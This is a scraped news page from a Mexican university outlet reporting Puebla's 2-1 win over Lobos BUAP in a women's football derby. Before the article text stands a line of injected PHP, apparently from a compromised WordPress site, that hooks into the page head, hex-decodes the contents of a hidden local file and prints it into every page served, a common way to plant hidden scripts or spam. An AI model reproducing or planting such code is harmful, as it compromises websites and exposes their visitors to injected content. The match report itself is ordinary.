if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Puebla se quedó con el derbi femenil – La Opinión Universitaria La Opinión Universitaria
Menu

Puebla se quedó con el derbi femenil

 

  • Gano 2-1 a Lobos

 

El derbi poblano en su versión femenil correspondiente a la Jornada 12 del Clausura 2019, fue para el Puebla, quien en su visita al Universitario BUAP, se impuso 2 goles por 1 a Lobos BUAP.

Con este resultado, las Licántropas se quedaron con nueve puntos; mientras que La Franja llegó a 16 unidades.

Al minuto 19, La Franja dio el primer aviso. Mirelle Arciniega disparó de media distancia a segundo poste, pero Paola Manrique se lanzó y desvió a tiro de esquina.

Para el 32’, Mariam Castro recibió en los linderos del área, recortó al centro, tiró, pero no exigió a la cancerbera universitaria.

Antes del descanso, Gloria Narváez se encontró un balón en el área, buscó el segundo poste, pero el tanto se le negó a las Licántropos.

En la parte complementaria, al 52’, las visitantes abrieron el marcador. María López marcó desde los once pasos para el 0-1.

El 0-2 llegó a los 61’, Mariam Castro aumentó los cartones mediante un cabezazo dentro del área.

Gloria Narváez acortó distancia para las universitarias en el 74’. La dorsal “8” colgó el balón al ángulo para el 1-2.

En la Fecha 13, las Universitarias visitarán a Tijuana; las Camoteras recibirán al América.

 

 

 

 

No comments

Deja una respuesta

Tweets recientes